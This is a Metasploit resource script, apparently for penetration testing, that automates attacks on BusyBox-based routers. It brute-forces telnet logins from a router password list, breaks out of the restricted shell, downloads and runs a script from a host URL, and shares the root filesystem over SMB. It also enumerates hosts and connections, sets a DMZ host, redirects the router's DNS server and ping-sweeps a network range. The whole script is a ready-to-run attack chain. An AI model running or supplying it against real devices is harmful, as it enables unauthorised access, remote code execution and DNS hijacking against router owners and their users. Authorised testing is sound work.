# auto_busybox.rc

<ruby>

def prepare_session()
  run_single("sessions -K")
  run_single("use auxiliary/scanner/telnet/telnet_login")
  run_single("set userpass_file C:/metasploit/apps/pro/msf3/data/wordlists/routers_userpass.txt")
  run_single("set STOP_ON_SUCCESS true")
  run_single("set RHOSTS #{framework.datastore['RHOSTS']}")
  run_single("set VERBOSE yes")
  run_single("run")
  sleep 1
  framework.sessions.each_key do |session|
    print_status("Running against session #{session}")
  	sleep 1
  	run_single("use post/linux/manage/busybox_jailbreak")
  	run_single("set SESSION #{session}")
  	run_single("set VERBOSE yes")
  	run_single("run")
  	sleep 1
  	return session
  end
end

if (framework.datastore['RHOSTS'] == nil)
	print_status("you have to set RHOSTS globally ... exiting")
	return
end

if (framework.datastore['TARGETHOST'] == nil)
	print_status("you have to set TARGETHOST globally ... exiting")
	return
end

if (framework.datastore['DNSSRV'] == nil)
	print_status("you have to set DNSSRV globally ... exiting")
	return
end

if (framework.datastore['STARTIP'] == nil)
	print_status("you have to set STARTIP globally ... exiting")
	return
end

if (framework.datastore['ENDIP'] == nil)
	print_status("you have to set STARTIP globally ... exiting")
	return
end

print_line("")
print_line("starting ...")
print_line("")

session=prepare_session()
run_single("use post/linux/manage/busybox_wgetandexec")
run_single("set URL http://#{framework.datastore['TARGETHOST']}/test.sh")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("run")
sleep 1

session=prepare_session()
run_single("use post/linux/manage/busybox_smb_share_root")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("run")
sleep 1

session=prepare_session()
run_single("use post/linux/gather/busybox_enum_hosts")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("run")
sleep 1

session=prepare_session()
run_single("use post/linux/gather/busybox_enum_connections")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("run")		
sleep 1

session=prepare_session()
run_single("use post/linux/manage/busybox_setdmz")
run_single("set TARGETHOST #{framework.datastore['TARGETHOST']}")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("set DELETE false")
run_single("run")		
sleep 1
		
session=prepare_session()
run_single("use post/linux/manage/busybox_setdmz")
run_single("set TARGETHOST #{framework.datastore['TARGETHOST']}")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("set DELETE true")
run_single("run")		
sleep 1

session=prepare_session()
run_single("use post/linux/manage/busybox_setdns")
run_single("set SRVHOST #{framework.datastore['DNSSRV']}")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("run")	
sleep 1

session=prepare_session()
run_single("use post/linux/gather/busybox_pingnet")
run_single("set IPRANGESTART #{framework.datastore['STARTIP']}")
run_single("set IPRANGEEND #{framework.datastore['ENDIP']}")
run_single("set SESSION #{session}")
run_single("set VERBOSE yes")
run_single("run")
sleep 1


#session=prepare_session()
#run_single("use post/linux/manage/busybox_control")
#run_single("set SESSION #{session}")
#run_single("run")
#sleep 1
#run_single("sessions -i #{session}")


</ruby>



